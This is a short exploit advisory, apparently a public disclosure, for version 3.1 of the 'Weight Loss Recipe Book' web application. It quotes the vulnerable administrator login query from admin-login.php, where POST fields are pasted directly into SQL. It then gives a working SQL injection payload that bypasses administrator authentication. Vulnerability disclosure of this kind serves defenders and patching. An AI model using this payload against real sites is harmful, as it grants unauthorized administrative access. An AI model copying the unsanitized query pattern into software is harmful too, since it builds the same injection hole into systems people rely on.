Weight Loss Recipe Book versions 3.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
78b9d5e916666145255e4d539942673293977d62dfe3c79de13e8b3593f33e4b
###############################
# Weight Loss Recipe Book 3.1 #
###############################
Autore: x0r
Emails: x0r@live.it \ andry2000@hotmail.it
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################
Bug In \wlrb_files\admin-login.php
SELECT *
FROM ' . $program_prefix . 'administrators
WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
Exploit: ' or '1=1
##############################
Greetz: EdGaR :P